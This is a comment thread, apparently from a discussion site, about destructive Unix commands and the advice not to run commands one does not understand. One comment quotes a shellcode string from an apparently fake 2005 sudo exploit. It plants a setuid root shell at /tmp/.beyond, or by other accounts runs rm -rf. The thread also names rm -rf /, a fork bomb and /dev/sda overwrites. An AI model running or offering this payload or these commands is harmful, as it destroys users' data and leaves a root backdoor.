11 comments

[ 2.9 ms ] story [ 33.7 ms ] thread
And we could come up with a million other different ways to wreck a un*x system. The only rule is not to run a command you don't understand, especially if it comes from an untrusted source.

Also, most of those commands won't hurt much if they're not run as root (except the forkbomb and the recursive chmod/rm, and rm won't let you do that by default). If you run untrusted commands as root you deserve what happens to you.

^That.

A simple rule of thumb is: don't run any commands you don't understand before looking up a few descriptions of what it means (or use man pages).

Number 2, for example, is just a bunch of shellcode, and unless you do penetration testing for a living, you probably can't directly see what it'd do. This goes not only for this particular script, but for mostly every piece of shellcode that can be written. (And make no mistake, there are a frapillion ways in which a piece of shellcode can utterly destroy your computer.) Ergo: don't run them if you don't get them.

    char esp[] _attribute_ ((section(".text"))) /* e.s.p release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
Can anyone explain this one? I would have guessed that it's causing an exec (or something equivalent) with argv "/bin/sh", "-c", "cp -p /bin/sh...". That's malicious if run as root ('4' in 4755 is setuid, so it basically hides a root shell in /tmp), but it's not 'rm -rf /'. I could believe that the post is wrong, but I'd still like to know how this works.

What I've gathered:

1. The final bytes of hex there are "/bin/sh\0-c\0", which is where I'm getting the argv from. The exec is mostly a guess, because I can't think what else it would be doing. The previous hex bytes are non-text, possibly precompiled executable code.

2. The '_attribute_ ((section(".text")))' is a gcc extension that causes this string not to be stored where it usually would be in the binary. I believe the .data section would be more normal? But I've never been very clear on what the different sections are for.

It's not even a valid C program, not to mention that it isn't a shell command

I found the earliest mention of this here, as part of a fake sudo exploit in 2005: http://seclists.org/fulldisclosure/2005/Aug/39

shoddy article.

[edit: as pointed out by hkolk, the exploit is fake and runs rm -rf]

It's definitely executable code EB 3E means jump 62 bytes ahead. Which lands on E8 BD FF FF FF which is a call 67 bytes back (i.e. calls the routine immediately following the previous jump)... and at this point I got too lazy :)
Most of those must be executed as root to cause harm.
which doesn't mean that running command as a user is less dangerous - in fact I think that rm -rf ~ is more damaging to a normal user than rm -rf /.
Pardon me but I'm impressed as a noob Linux user. 12 commands listed. 6 of them are rm -rf jokes, 6 of them are /dev/sda jokes. I'd expect different cool stuff.
FWIW, and please do not rely on this or test it, but rm -rf / should not do anything on most Linux installs since --preserve-root is the default.
Not my proudest moment: once I set up a chroot with several directories using "mount --bind". Then I didn't need it anymore, so I promptly issued an "rm -rf *".